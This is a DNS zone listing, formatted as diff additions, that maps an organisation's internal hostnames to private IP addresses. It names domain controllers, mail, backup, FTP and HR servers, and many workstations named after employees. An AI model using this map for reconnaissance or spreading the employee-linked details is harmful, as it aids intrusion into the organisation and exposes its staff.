+ENAMDEV063 [Aging:3618456] 1200 A	192.168.0.209
+ENAMDEV064 [Aging:3618446] 900 A	192.168.0.204
+ENAMDEV065 [Aging:3618456] 900 A	192.168.0.199
+ENAMDEV068 [Aging:3611167] 1200 A	192.168.0.35
+ENAMDEV072 [Aging:3609804] 1200 A	192.168.0.201
+		 [Aging:3609804] 1200 A	192.168.50.74
+ENAMDEV076 [Aging:3618260] 1200 A	10.10.200.22
+ENAMDEV081 [Aging:3618113] 1200 A	10.10.200.64
+ENAMDEV083 [Aging:3618299] 1200 A	10.10.200.16
+ENAMDEV085 [Aging:3618374] 1200 A	10.10.200.8
+ENAMDEV088 [Aging:3612515] 1200 A	192.168.50.135
+ENAMDEV092 [Aging:3608981] 1200 A	192.168.50.92
+ENAMDEV101 [Aging:3610236] 1200 A	192.168.50.77
+ENAMDEV102 [Aging:3608988] 1200 A	192.168.0.195
+ENAMDEV103 [Aging:3611244] 1200 A	192.168.50.151
+ENAMDEV104 [Aging:3613430] 1200 A	192.168.0.181
+ENAMDEV107 [Aging:3616185] 1200 A	192.168.0.121
+		 [Aging:3616185] 1200 A	192.168.50.41
+ENAMDEV112 [Aging:3614721] 1200 A	192.168.50.65
+ENAMDEV116 [Aging:3615899] 1200 A	192.168.0.171
+		 [Aging:3615899] 1200 A	192.168.0.212
+ENAMDEV118 [Aging:3615774] 1200 A	192.168.0.154
+ENAMDEV124 [Aging:3618464] 900 A	192.168.0.182
+enameng004 [Aging:3618163] 1200 A	10.10.200.18
+ENAMENG005 [Aging:3610164] 1200 A	192.168.0.177
+ENAMEPMTEST [Aging:3610715] 1200 A	192.168.0.116
+ENAMGM01 [Aging:3609846] 1200 A	192.168.50.116
+ENAMGP002 [Aging:3610208] 1200 A	192.168.50.95
+ENAMGP01 [Aging:3618452] 1200 A	192.168.0.13
+ENAMGPTEST [Aging:3606612] 1200 A	192.168.50.109
+ENAMHANADI [Aging:3612585] 1200 A	192.168.50.58
+ENAMHR001 [Aging:3616880] 1200 A	10.10.10.64
+enamhr002 [Aging:3607525] 1200 A	192.168.50.103
+ENAMHRBACKUP [Aging:3613403] 1200 A	192.168.0.139
+ENAMHRMGR [Aging:3618253] 1200 A	10.10.200.16
+ENAMHYPER01 [Aging:3618445] 1200 A	192.168.0.37
+ENAMHYPER02 [Aging:3618445] 1200 A	192.168.0.38
+ENAMIT [Aging:3610835] 1200 A	192.168.50.65
+		 [Aging:3610835] 1200 A	192.168.50.87
+ENAMIT001 [Aging:3608130] 1200 A	10.10.200.8
+enamit002 [Aging:3610879] 1200 A	192.168.0.150
+ENAMITBACKUP001 [Aging:3608624] 1200 A	192.168.0.232
+enamittest01 [Aging:3609456] 1200 A	192.168.0.35
+enamlearn2 [Aging:3616256] 1200 A	192.168.0.219
+ENAMLYNC2010 [Aging:3618444] 1200 A	192.168.0.27
+ENAMMAD001 [Aging:3618466] 3600 A	192.168.0.15
+ENAMMAD002 [Aging:3618465] 3600 A	192.168.0.16
+enammIS [Aging:3608363] 1200 A	192.168.100.102
+ENAMMIT [Aging:3611846] 1200 A	192.168.50.53
+ENAMPDM002 [Aging:3616596] 1200 A	192.168.50.34
+		 [Aging:3616596] 1200 A	192.168.0.192
+enampdm004 [Aging:3611239] 1200 A	192.168.0.201
+ENAMPDM007 [Aging:3612658] 1200 A	192.168.0.118
+ENAMPDM009 [Aging:3613925] 1200 A	10.10.10.89
+ENAMPDM011 [Aging:3617029] 1200 A	192.168.50.161
+ENAMPRINTER01 [Aging:3618463] 1200 A	192.168.0.243
+enamprinter02 [Aging:3618447] 1200 A	192.168.0.241
+enamprinter03 [Aging:3618367] 1200 A	192.168.0.242
+enamprinter04 [Aging:3610062] 1200 A	192.168.0.246
+ENAMPRO001 [Aging:3607063] 1200 A	192.168.253.70
+ENAMQA014 [Aging:3618359] 1200 A	10.10.200.4
+ENAMQA021 [Aging:3617291] 1200 A	10.10.200.28
+ENAMQABACKUP [Aging:3615582] 1200 A	192.168.0.170
+ENAMQABACKUP3 [Aging:3618444] 900 A	192.168.50.135
+ENAMQATEST01 [Aging:3608960] 1200 A	192.168.50.70
+ENAMRESEARCH002 [Aging:3597917] 1200 A	10.10.10.54
+ENAMRESILIENCE [Aging:3618461] 1200 A	192.168.100.235
+ENAMSALE002 [Aging:3613232] 1200 A	192.168.0.55
+ENAMSALE008 [Aging:3618366] 1200 A	10.10.10.42
+ENAMSALE010 [Aging:3612730] 1200 A	10.10.10.149
+ENAMSEC007 [Aging:3614741] 1200 A	192.168.0.92
+ENAMSEC008 [Aging:3614405] 1200 A	192.168.0.106
+ENAMSP01 [Aging:3618456] 1200 A	192.168.0.12
+ENAMSP2010 [Aging:3617364] 1200 A	192.168.0.36
+ENAMSP2013 [Aging:3614910] 1200 A	192.168.0.111
+enamsw008 [Aging:3601336] 1200 A	192.168.253.116
+enamsw009 [Aging:3596909] 1200 A	10.10.10.32
+enamsw010 [Aging:3599145] 1200 A	10.10.10.118
+enamsw011 [Aging:3607784] 1200 A	192.168.50.148
+ENAMSW030 [Aging:3612175] 1200 A	192.168.50.121
+ENAMSW032 [Aging:3616263] 1200 A	192.168.50.101
+ENAMSW036 [Aging:3618445] 1200 A	192.168.153.135
+ENAMSW037 [Aging:3618466] 1200 A	10.10.200.10
+ENAMSW038 [Aging:3618465] 1200 A	192.168.253.131
+ENAMSW049 [Aging:3605934] 1200 A	192.168.50.67
+enamsw051 [Aging:3610547] 1200 A	192.168.0.146
+enamsw054 [Aging:3606110] 1200 A	192.168.50.68
+ENAMSW055 [Aging:3612033] 1200 A	192.168.0.52
+enamsw056 [Aging:3609877] 1200 A	192.168.0.107
+ENAMSW068 [Aging:3618447] 900 A	192.168.0.224
+ENAMTARINER01 [Aging:3616448] 1200 A	192.168.0.54
+ENAMTRAINER02 [Aging:3616595] 1200 A	192.168.50.240
+ENAMVCAS01 [Aging:3618445] 1200 A	192.168.0.42
+ENAMVCAS02 [Aging:3618450] 1200 A	192.168.0.45
+ENAMVHUB01 [Aging:3618445] 1200 A	192.168.0.43
+ENAMVHUB02 [Aging:3618451] 1200 A	192.168.0.46
+ENAMVM0010 [Aging:3617288] 1200 A	192.168.100.54
+ENAMVM003 [Aging:3618225] 1200 A	192.168.100.52
+ENAMVM004 [Aging:3618465] 1200 A	192.168.100.53
+ENAMVM005 [Aging:3614004] 1200 A	192.168.50.62
+ENAMVM006 [Aging:3614001] 1200 A	192.168.0.54
+ENAMVM007 [Aging:3614053] 1200 A	192.168.0.81
+ENAMVM008 [Aging:3618252] 1200 A	192.168.100.55
+ENAMVMAIL01 [Aging:3618466] 1200 A	192.168.0.44
+ENAMVmail02 [Aging:3618465] 1200 A	192.168.0.47
+ENAMWIN8 [Aging:3610903] 1200 A	192.168.50.44
+ENANAS [Aging:3616739] 1200 A	192.168.0.218
+Enas-PC [Aging:3614194] 1200 A	10.10.0.199
+ENattendance [Aging:3618463] 1200 A	192.168.100.240
+ENBABILOUET [Aging:3603201] 1200 A	192.168.253.158
+ENBALENAERTS [Aging:3618466] 1200 A	192.168.253.62
+enbaraskin [Aging:3610191] 1200 A	192.168.253.217
+ENBAVASSART [Aging:3618463] 1200 A	192.168.253.39
+enbavergine [Aging:3602462] 1200 A	192.168.253.93
+ENBCCARVALHO [Aging:3618463] 1200 A	192.168.253.76
+enbddutheil [Aging:3599269] 1200 A	192.168.253.131
+ENBDSWF [Aging:3610834] 1200 A	192.168.100.153
+ENBDSWF2 [Aging:3605841] 1200 A	192.168.50.32
+ENBDZOVI [Aging:3618299] 1200 A	192.168.253.64
+enbe-dsottiau [Aging:3613072] 1200 A	192.168.253.116
+enbeaix02 3600 A	192.168.240.121
+enbeaix03 3600 A	192.168.240.122
+enbeaix04 3600 A	192.168.240.123
+enbeaix05 3600 A	192.168.240.124
+enbeaix06 3600 A	192.168.240.125
+enbeaix07 3600 A	192.168.240.126
+enbeaix08 3600 A	192.168.240.127
+enbeaix09 3600 A	192.168.240.128
+enbeaix10 3600 A	192.168.240.129
+enbeaix11 3600 A	192.168.240.130
+ENBEAKUMAR [Aging:3612680] 1200 A	192.168.253.103
+enbebackup01 [Aging:3607545] 1200 A	192.168.253.232
+ENBEBB01 [Aging:3618466] 1200 A	192.168.253.115
+enbeclapage [Aging:3618464] 1200 A	192.168.253.71
+ENBECO-100 [Aging:3598497] 1200 A	192.168.253.95
+ENBEDC01 [Aging:3618466] 3600 A	192.168.253.230
+ENBEDE-0002 [Aging:3618467] 1200 A	192.168.253.51
+enbede-0005 [Aging:3615753] 1200 A	192.168.253.147
+ENBEDE-0006 [Aging:3610190] 1200 A	192.168.253.140
+ENBEDE-0008 [Aging:3602186] 1200 A	192.168.253.158
+ENBEDE-0010 [Aging:3597919] 1200 A	192.168.253.220
+enbede-0013 [Aging:3611388] 1200 A	192.168.253.221
+ENBEDE-0014 [Aging:3608840] 1200 A	192.168.253.186
+ENBEDE-0015 [Aging:3607710] 1200 A	192.168.253.238
+enbede-0016 [Aging:3602186] 1200 A	192.168.253.62
+enbede-0020 [Aging:3606367] 1200 A	192.168.253.95
+enbede-0021 [Aging:3609085] 1200 A	192.168.253.222
+ENBEDE-0040 [Aging:3600750] 1200 A	192.168.253.192
+ENBEDE-0041 [Aging:3607134] 1200 A	192.168.253.33
+ENBEDE-0042 [Aging:3604287] 1200 A	192.168.253.116
+ENBEDE-0050 [Aging:3603464] 1200 A	192.168.253.71
+ENBEDE-0051 [Aging:3618457] 1200 A	192.168.253.59
+ENBEDE-0052 [Aging:3618457] 1200 A	192.168.253.185
+ENBEDE-0053 [Aging:3600419] 1200 A	192.168.253.88
+enbede-0070 [Aging:3618457] 1200 A	192.168.253.50
+ENBEDE-PQLE [Aging:3598158] 1200 A	192.168.253.168
+ENBEDE0005 [Aging:3618443] 1200 A	192.168.253.147
+ENBEDEMPEETERS [Aging:3615601] 1200 A	192.168.253.184
+ENBEDEVLAP01 [Aging:3606513] 1200 A	192.168.253.184
+ENBEFINET [Aging:3618465] 1200 A	192.168.253.73
+ENBEFNOEL [Aging:3618441] 1200 A	10.10.50.8
+ENBEfortega [Aging:3598279] 1200 A	192.168.253.70
+		 [Aging:3598279] 1200 A	192.168.253.81
+ENBEFPOULET [Aging:3618457] 1200 A	192.168.253.40
+enbefs01 [Aging:3606135] 1200 A	192.168.253.138
+ENBEFTP01 [Aging:3618464] 1200 A	192.168.253.201
+ENBEFVERHAEVER [Aging:3618464] 1200 A	192.168.251.12
+		 [Aging:3618464] 1200 A	10.10.200.128
+ENBEGP01 [Aging:3618445] 1200 A	192.168.253.11
+enbegp1 [Aging:3605533] 1200 A	192.168.253.11
+ENBEGPVM01 [Aging:3607729] 1200 A	192.168.253.135
+ENBEJNUNEZ [Aging:3618466] 1200 A	10.10.50.10
+ENBEKAVADMIN [Aging:3614779] 1200 A	192.168.240.20
+enbela-0010 [Aging:3603661] 1200 A	192.168.253.135
+enbela-00100 [Aging:3613617] 1200 A	192.168.253.113
+ENBELA-0036 [Aging:3617949] 1200 A	192.168.253.170
+ENBELA-RRIPMEES [Aging:3607810] 1200 A	192.168.253.135
+ENBELAMBERT [Aging:3612394] 1200 A	192.168.253.114
+enbelap-0051 [Aging:3600948] 1200 A	192.168.253.238
+ENBELAP-SUPP02 [Aging:3599461] 1200 A	192.168.253.114
+enbelnx001 3600 A	192.168.253.198
+enbelnx002 3600 A	192.168.253.199
+enbelnx003 3600 A	192.168.253.190
+enbelnx004 3600 A	192.168.253.53
+enbelnx005 3600 A	192.168.253.54
+enbemail01 [Aging:3618447] 1200 A	192.168.253.231
+enbeManager01 [Aging:3614434] 1200 A	192.168.253.199
+enbens01 [Aging:3603877] 1200 A	192.168.253.177
+ENBENSOUDRON [Aging:3610502] 1200 A	192.168.253.48
+enbeprint01 [Aging:3616403] 1200 A	192.168.253.184
+ENBERPATTA [Aging:3618458] 1200 A	192.168.253.168
+enbeslouise [Aging:3604457] 1200 A	192.168.253.153
+enbesol01 3600 A	192.168.240.150
+enbesol02 3600 A	192.168.240.151
+enbesol03 3600 A	192.168.240.152
+enbesol04 3600 A	192.168.240.153
+enbesol05 3600 A	192.168.240.154
+ENBETEST-0001 [Aging:3596429] 1200 A	192.168.253.182
+ENBETEST01 [Aging:3618466] 1200 A	192.168.253.112
+ENBETPATNELL [Aging:3618466] 1200 A	192.168.253.146
+ENBEVCAS01 [Aging:3618464] 1200 A	192.168.240.17
+		 [Aging:3618464] 1200 A	192.168.240.15
+ENBEVcas02 [Aging:3618464] 1200 A	192.168.240.16
+		 [Aging:3618464] 1200 A	192.168.240.18
+ENBEVDC1 3600 A	192.168.240.10
+ENBEVHUB01 [Aging:3618464] 1200 A	192.168.240.13
+ENBEVhub02 [Aging:3618464] 1200 A	192.168.240.14
+ENBEVMAIL01 [Aging:3618464] 1200 A	192.168.240.11
+ENBEVMAIL02 [Aging:3618464] 1200 A	192.168.240.12
+enbevmsrv01 [Aging:3600463] 1200 A	192.168.253.251
+ENBEWIM [Aging:3612536] 1200 A	192.168.253.64
+ENBFOGER [Aging:3618443] 1200 A	192.168.253.220
+ENBGMORASCHI [Aging:3618462] 1200 A	192.168.253.136
+enbiarchavlis [Aging:3602703] 1200 A	192.168.253.68
+ENBJDERENNE [Aging:3603321] 1200 A	192.168.253.173
+enbjoudkerk [Aging:3612232] 1200 A	192.168.253.243
+ENBLAP-NGATA [Aging:3611888] 1200 A	192.168.253.31
+ENBLAP-SUPP01 [Aging:3618463] 1200 A	192.168.253.217
+enbnverguyse [Aging:3600847] 1200 A	192.168.253.41
+enbnverguyse1 [Aging:3610381] 1200 A	192.168.253.188
+ENBODENIS [Aging:3618465] 1200 A	192.168.253.195
+		 [Aging:3618465] 1200 A	192.168.253.93
+ENBPBUELENS [Aging:3603686] 1200 A	192.168.253.76
+enbsgathy [Aging:3606654] 1200 A	192.168.253.139
+enbslouis [Aging:3618464] 1200 A	192.168.253.86
+		 [Aging:3618464] 1200 A	192.168.253.100
+enbvpardal [Aging:3618464] 1200 A	192.168.253.91
+END-JANTES [Aging:3602987] 1200 A	10.10.10.61
+endarousan [Aging:3599070] 1200 A	10.10.10.151
+endcbackup [Aging:3618465] 3600 A	192.168.2.25
+endCSLebanon1 [Aging:3604973] 1200 A	10.10.10.118
+ENDDBOUGUERRA [Aging:3618369] 1200 A	10.10.10.70
+ENDHKHAN [Aging:3601446] 1200 A	10.10.10.113
+endial 3600 A	192.168.0.7
+ENDIIBRAHIM [Aging:3608981] 1200 A	10.10.10.107
+ENDLHEDIAH1 [Aging:3618367] 1200 A	10.10.10.97
+ENDMFARID [Aging:3618365] 1200 A	10.10.10.95
+endmhamza [Aging:3598085] 1200 A	10.10.10.66
+ENDMJAREER [Aging:3618226] 1200 A	10.10.10.24
+endmsalameh [Aging:3614240] 1200 A	10.10.10.139
+ENDOT [Aging:3608531] 1200 A	192.168.100.141
+endrkheir [Aging:3605625] 1200 A	10.10.0.109
+ENDSALLOUM [Aging:3598425] 1200 A	10.10.10.115
+		 [Aging:3598425] 1200 A	10.10.10.20
+enDubai001 [Aging:3618365] 1200 A	10.10.10.35
+endudai0001 [Aging:3610829] 1200 A	10.10.10.67
+ENDXB- [Aging:3612900] 1200 A	10.10.10.138
+ENDXB-ADHAM [Aging:3618455] 1200 A	10.10.10.207
+ENDXB-AGHALION [Aging:3598210] 1200 A	10.10.10.112
+ENDXB-AHAMSA [Aging:3618297] 1200 A	10.10.10.56
+endxb-Amahmoud [Aging:3614170] 1200 A	10.10.10.85
+ENDXB-AMJAD [Aging:3618365] 1200 A	10.10.10.90
+ENDXB-ARD [Aging:3614720] 1200 A	10.10.10.51
+		 [Aging:3614720] 1200 A	10.10.10.54
+endxb-ashraf [Aging:3599890] 1200 A	10.10.10.51
+ENDXB-ASUMERIN [Aging:3614050] 1200 A	10.10.10.103
+endxb-bcampbell [Aging:3604040] 1200 A	192.168.253.55
+ENDXB-CALTAKI [Aging:3618369] 1200 A	10.10.10.20
+ENDXB-Cobas [Aging:3618370] 1200 A	10.10.10.131
+ENDXB-Danielekhoury [Aging:3618248] 1200 A	10.10.10.128
+endxb-dbouguerra [Aging:3609221] 1200 A	10.10.10.110
+ENDXB-DKHOURY [Aging:3618196] 1200 A	10.10.10.42
+ENDXB-DMASAD [Aging:3618365] 1200 A	10.10.10.41
+endxb-dpallavi [Aging:3615123] 1200 A	10.10.10.56
+ENDXB-DSAMAWI [Aging:3612391] 1200 A	10.10.10.119
+ENDXB-ELSA [Aging:3618371] 1200 A	10.10.10.83
+ENDXB-EMAGSOMBOL [Aging:3604973] 1200 A	10.10.10.130
+ENDXB-FTP [Aging:3618445] 1200 A	10.10.10.250
+ENDXB-GBAGCAT [Aging:3616616] 1200 A	10.10.10.57
+endxb-ghaith [Aging:3608001] 1200 A	10.10.10.118
+endxb-gjarrar [Aging:3600469] 1200 A	10.10.10.82
+ENDXB-Halikhan [Aging:3617286] 1200 A	10.10.10.116
+ENDXB-HCHAMAS [Aging:3615345] 1200 A	10.10.10.119
+Endxb-hp [Aging:3617695] 1200 A	10.10.10.64
+ENDXB-Hreyes [Aging:3618371] 1200 A	10.10.10.96
+		 [Aging:3618371] 1200 A	10.10.10.125
+ENDXB-Hreyes2 [Aging:3618372] 1200 A	10.10.10.34
+		 [Aging:3618372] 1200 A	10.10.10.36
+endxb-htahrawi [Aging:3613735] 1200 A	10.10.10.128
+ENDXB-IBRAHIM [Aging:3610019] 1200 A	10.10.10.109
+ENDXB-IIBRAHIM [Aging:3618373] 1200 A	192.168.3.18
+endxb-jsalinog [Aging:3618364] 1200 A	10.10.10.61
+ENDXB-kaisarshahzad [Aging:3617069] 1200 A	10.10.10.78
+ENDXB-KALOMARI [Aging:3604818] 1200 A	10.10.200.13
+endxb-kbaluyot [Aging:3618301] 1200 A	10.10.10.46
+ENDXB-KPURSWANI [Aging:3609661] 1200 A	10.10.10.34
+		 [Aging:3609661] 1200 A	10.10.10.29
+ENDXB-KRISTINE [Aging:3610636] 1200 A	10.10.10.154
+		 [Aging:3610636] 1200 A	10.10.10.93
+ENDXB-KSHAHZAD [Aging:3610876] 1200 A	10.10.10.82
+ENDXB-LHEDIAH [Aging:3597107] 1200 A	10.10.10.140
+ENDXB-LMARSHOUD [Aging:3598283] 1200 A	10.10.10.121
+ENDXB-MAGDA [Aging:3600812] 1200 A	10.10.10.163
+		 [Aging:3600812] 1200 A	10.10.10.133
+ENDXB-MAGDAH [Aging:3601831] 1200 A	10.10.10.138
+ENDXB-MAGDAHAMZA [Aging:3600825] 1200 A	10.10.10.133
+ENDXB-MARYANNE [Aging:3613372] 1200 A	10.10.10.38
+endxb-marylowry [Aging:3618205] 1200 A	10.10.10.36
+ENDXB-MDABBAGH [Aging:3616930] 1200 A	10.10.10.118
+endxb-mderiada [Aging:3617261] 1200 A	10.10.10.64
+ENDXB-MDKHAYYAM [Aging:3618298] 1200 A	10.10.10.74
+ENDXB-MHAMZA [Aging:3608621] 1200 A	10.10.10.110
+ENDXB-MJARABEJO [Aging:3604448] 1200 A	10.10.10.107
+endxb-mjareer [Aging:3601230] 1200 A	10.10.10.37
+ENDXB-MLEMORINAS [Aging:3607186] 1200 A	10.10.10.109
+		 [Aging:3607186] 1200 A	10.10.10.79
+ENDXB-MLEMORNAS [Aging:3618369] 1200 A	10.10.10.28
+ENDXB-MMAALI [Aging:3598764] 1200 A	10.10.10.125
+ENDXB-Mmulhim [Aging:3618248] 1200 A	10.10.10.128
+ENDXB-MNAHAWI [Aging:3618300] 1200 A	10.10.10.108
+ENDXB-MNAYFEH [Aging:3617629] 1200 A	10.10.10.114
+ENDXB-MRABAINO [Aging:3618292] 1200 A	10.10.10.88
+		 [Aging:3618292] 1200 A	10.10.10.107
+ENDXB-MSYED [Aging:3616927] 1200 A	10.10.10.74
+ENDXB-Msyed2 [Aging:3618365] 1200 A	10.10.10.122
+endxb-mtiero [Aging:3618373] 1200 A	10.10.10.93
+ENDXB-MZAIDI [Aging:3610209] 1200 A	10.10.10.53
+endxb-oasseedeh [Aging:3597373] 1200 A	10.10.10.82
+endxb-osaid [Aging:3599119] 1200 A	10.10.10.27
+ENDXB-PPU [Aging:3605959] 1200 A	10.10.10.225
+ENDXB-QAIS [Aging:3618451] 1200 A	10.10.10.59
+ENDXB-QIDRISI [Aging:3613589] 1200 A	10.10.10.135
+ENDXB-RAGARWAL [Aging:3611219] 1200 A	10.10.10.73
+ENDXB-RAJESHK [Aging:3615373] 1200 A	10.10.10.92
+ENDXB-RASHA [Aging:3611548] 1200 A	10.10.10.39
+ENDXB-RAYMOND [Aging:3603492] 1200 A	10.10.10.154
+ENDXB-RAZA [Aging:3614801] 1200 A	10.10.10.28
+		 [Aging:3614801] 1200 A	10.10.10.121
+ENDXB-RAZMI [Aging:3597251] 1200 A	10.10.10.184
+ENDXB-RChanine [Aging:3599050] 1200 A	10.10.10.90
+endxb-rcunanan [Aging:3617555] 1200 A	10.10.10.126
+ENDXB-ROWENA [Aging:3612701] 1200 A	10.10.10.66
+endxb-rowena-pc [Aging:3618367] 1200 A	10.10.10.102
+ENDXB-SALAMEH [Aging:3599238] 1200 A	10.10.10.86
+ENDXB-SALES [Aging:3618461] 1200 A	192.168.3.101
+ENDXB-SALVA [Aging:3597221] 1200 A	10.10.10.49
+endxb-sfawadleh [Aging:3612323] 1200 A	10.10.10.147
+ENDXB-SMAHMOUD [Aging:3618362] 1200 A	10.10.10.76
+ENDXB-SMAKKIEH [Aging:3600835] 1200 A	10.10.10.142
+ENDXB-SWETHA [Aging:3600296] 1200 A	10.10.10.159
+endxb-theobaxte [Aging:3597436] 1200 A	10.10.10.80
+ENDXB-TKEYROUZ [Aging:3616231] 1200 A	10.10.10.120
+ENDXB-Vanessa [Aging:3617767] 1200 A	10.10.10.77
+ENDXB-VANTONIO [Aging:3611989] 1200 A	10.10.10.97
+ENDXB-VDrego [Aging:3618367] 1200 A	10.10.10.42
+ENDXBABUGHALION [Aging:3601325] 1200 A	10.10.10.99
+ENDXBARD [Aging:3614745] 1200 A	10.10.10.51
+endxbcrm [Aging:3618455] 1200 A	192.168.3.11
+ENDXBDC001 [Aging:3618467] 3600 A	192.168.3.10
+endxbgp [Aging:3618464] 1200 A	192.168.3.12
+ENDXBJMAGCULANG [Aging:3607996] 1200 A	10.10.10.67
+		 [Aging:3607996] 1200 A	10.10.10.27
+ENDXBMLEMORINAS [Aging:3601459] 1200 A	10.10.10.97
+ENDXBMRABAINO [Aging:3597533] 1200 A	10.10.10.47
+ENDXBTOSHIBA [Aging:3618370] 1200 A	10.10.10.34
+ENDXBYAbuAnzeh [Aging:3618365] 1200 A	10.10.10.84
+ENE-30old [Aging:3598186] 1200 A	10.10.0.168
+ENE-CPL010 [Aging:3618270] 1200 A	10.10.0.105
+ENE-DEV-Test [Aging:3596749] 1200 A	10.10.0.14
+ENE-Eyasinlab [Aging:3598110] 1200 A	10.10.0.133
+ENE-xp [Aging:3606346] 1200 A	10.10.0.13
+ENE001 [Aging:3618444] 1200 A	10.10.0.53
+ENE001A [Aging:3608984] 1200 A	10.10.0.147
+ENE002 [Aging:3618133] 1200 A	10.10.0.89
+ENE002A [Aging:3603348] 1200 A	10.10.0.156
+ENE002j [Aging:3609367] 1200 A	10.10.0.136
+ENE002T [Aging:3598186] 1200 A	10.10.0.65
+ENE003 [Aging:3618446] 1200 A	10.10.0.98
+ENE003A [Aging:3610665] 1200 A	10.10.0.71
+ENE003T [Aging:3600583] 1200 A	10.10.0.175
+ENE004 [Aging:3604017] 1200 A	10.10.0.98
+ENE004A [Aging:3600581] 1200 A	10.10.0.145
+ENE006T [Aging:3603347] 1200 A	10.10.0.58
+ENE007 [Aging:3609394] 1200 A	10.10.0.97
+ENE008 [Aging:3604280] 1200 A	10.10.0.57
+ENE009 [Aging:3607997] 1200 A	10.10.0.87
+ENE010 [Aging:3618113] 1200 A	10.10.0.157
+ene011 [Aging:3618463] 1200 A	10.10.0.78
+ENE012old [Aging:3600464] 1200 A	10.10.0.171
+ene013 [Aging:3618461] 1200 A	10.10.0.85
+ene014 [Aging:3618294] 1200 A	10.10.0.79
+ENE015 [Aging:3618061] 1200 A	10.10.0.70
+ENE016 [Aging:3618294] 1200 A	10.10.0.149
+ENE017 [Aging:3618462] 1200 A	10.10.0.65
+ene018 [Aging:3618133] 1200 A	10.10.0.121
+ene019 [Aging:3618108] 1200 A	10.10.0.99
+ENE020 [Aging:3618462] 1200 A	10.10.0.91
+ENE021 [Aging:3607665] 1200 A	10.10.0.85
+ENE022 [Aging:3610523] 1200 A	10.10.0.104
+ENE023 [Aging:3617864] 1200 A	10.10.0.160
+ene024 [Aging:3602286] 1200 A	10.10.0.117
+ene025 [Aging:3609366] 1200 A	10.10.0.76
+ene026 [Aging:3618133] 1200 A	10.10.0.119
+ene027 [Aging:3618465] 1200 A	10.10.0.83
+ENE029 [Aging:3618133] 1200 A	10.10.0.138
+ENE030 [Aging:3618133] 1200 A	10.10.0.76
+ene031 [Aging:3618444] 1200 A	10.10.0.74
+ENE032 [Aging:3618133] 1200 A	10.10.0.147
+ene033 [Aging:3618133] 1200 A	10.10.0.92
+ENE034 [Aging:3618295] 1200 A	10.10.0.75
+ene036 [Aging:3618462] 1200 A	10.10.0.88
+ene037 [Aging:3618246] 1200 A	10.10.0.84
+ENE038 [Aging:3618294] 1200 A	10.10.0.148
+ene040 [Aging:3602502] 1200 A	10.10.0.108
+ENE041 [Aging:3610835] 1200 A	10.10.0.64
+ENE042 [Aging:3609367] 1200 A	10.10.0.102
+ene043 [Aging:3618133] 1200 A	10.10.0.163
+ENE046 [Aging:3618466] 1200 A	10.10.0.112
+ENE049 [Aging:3618270] 1200 A	10.10.0.135
+ENE050 [Aging:3618462] 1200 A	10.10.0.182
+ene051 [Aging:3608646] 1200 A	10.10.0.91
+ENE057 [Aging:3608841] 1200 A	10.10.0.113
+ENE058 [Aging:3618134] 1200 A	10.10.0.110
+ENE059 [Aging:3603272] 1200 A	10.10.0.118
+ENEACC001 [Aging:3618461] 1200 A	10.10.0.69
+ENEacer3 [Aging:3596939] 1200 A	10.10.0.175
+ENEAcer4 [Aging:3598398] 1200 A	10.10.0.97
+ENEAllTracer [Aging:3618462] 1200 A	10.10.0.227
+enebackup [Aging:3612011] 1200 A	10.10.0.204
+ENEcpl050 [Aging:3618466] 1200 A	10.10.0.90
+ENEDB [Aging:3618464] 1200 A	10.10.0.8
+ENEDBServer2 [Aging:3618464] 1200 A	10.10.0.180
+enedc [Aging:3618465] 3600 A	10.10.0.5
+ENEDEV001 [Aging:3600084] 1200 A	10.10.0.159
+enedev001n [Aging:3603342] 1200 A	10.10.0.56
+ENEDEV002 [Aging:3610831] 1200 A	10.10.0.57
+ENEDEV003 [Aging:3618445] 1200 A	10.10.0.134
+ENEDEV004 [Aging:3613400] 1200 A	10.10.0.233
+enedevhasanen [Aging:3618444] 1200 A	10.10.0.233
+enedt [Aging:3618444] 1200 A	10.10.0.21
+ENEENASLAP [Aging:3618229] 1200 A	10.10.0.199
+ENEfatmalap [Aging:3616928] 1200 A	10.10.0.166
+		 [Aging:3616928] 1200 A	10.10.0.72
+ENEFSERVER [Aging:3618455] 1200 A	10.10.0.6
+ENEIDM [Aging:3618466] 1200 A	10.10.0.7
+enemail [Aging:3618464] 1200 A	10.10.0.4
+		 3600 MX	10 enemail.eastnets.com.
+enendb [Aging:3602122] 1200 A	10.10.0.14
+ENEOgomalap [Aging:3616258] 1200 A	10.10.0.96
+ENEPrinter [Aging:3606180] 1200 A	10.10.0.125
+enerashalap [Aging:3610998] 1200 A	10.10.0.63
+ENEServer64bit [Aging:3603757] 1200 A	10.10.0.9
+ENESUNVM 3600 A	10.10.0.228
+enetest3 [Aging:3603150] 1200 A	10.10.0.59
+enetestserver [Aging:3615751] 1200 A	10.10.0.155
+ENEU-NNASSR [Aging:3616736] 1200 A	192.168.253.84
+eneu0420132 [Aging:3618081] 1200 A	192.168.253.92
+ENEUADRISSI [Aging:3618125] 1200 A	192.168.253.31
+ENEUAKUMAR [Aging:3618463] 1200 A	192.168.253.216
+ENEUALHEUREUX [Aging:3618443] 1200 A	192.168.253.133
+ENEUDDUTHEIL [Aging:3606632] 1200 A	192.168.251.10
+ENEUFINANCE01 [Aging:3618461] 1200 A	192.168.253.153
+eneujlaera [Aging:3618447] 1200 A	10.10.200.25
+		 [Aging:3618447] 1200 A	192.168.251.44
+ENEULDELCROIX [Aging:3617912] 1200 A	192.168.253.61
+ENEULUX01 [Aging:3612536] 1200 A	192.168.253.105
+ENEUNNASSR2 [Aging:3618464] 1200 A	192.168.253.61
+eneusgathy [Aging:3618457] 1200 A	192.168.253.142
+ENEUSMARCHANT [Aging:3618463] 1200 A	192.168.253.199
+ENEUSTHROMAS [Aging:3614365] 1200 A	192.168.253.106
+ENEUTEST042013 [Aging:3615874] 1200 A	192.168.253.113
+ENEVMMonitor [Aging:3604076] 1200 A	10.10.0.14
+ENGDIS [Aging:3617896] 1200 A	10.10.200.11
+ENGY-PC [Aging:3618391] 1200 A	10.10.0.123
+enhq-backup [Aging:3618462] 1200 A	10.10.10.3
+ENHQ-BLACKBERRY [Aging:3597077] 1200 A	10.10.10.200
+ENHR [Aging:3613398] 1200 A	192.168.50.105
+ENHRIS [Aging:3618445] 1200 A	192.168.0.11
+ENITOMAR [Aging:3618346] 1200 A	10.10.200.1
+ENJOSEPH-PC [Aging:3600513] 1200 A	192.168.253.124
+enjysaadlap [Aging:3617028] 1200 A	10.10.0.52
+		 [Aging:3617028] 1200 A	10.10.0.57
+enlap-xkervyn [Aging:3598135] 1200 A	192.168.253.106
+ENLEPROJECT001 [Aging:3604475] 1200 A	10.10.200.29
+enlyncse 3600 A	192.168.0.7
+enmeeting 3600 A	192.168.0.7
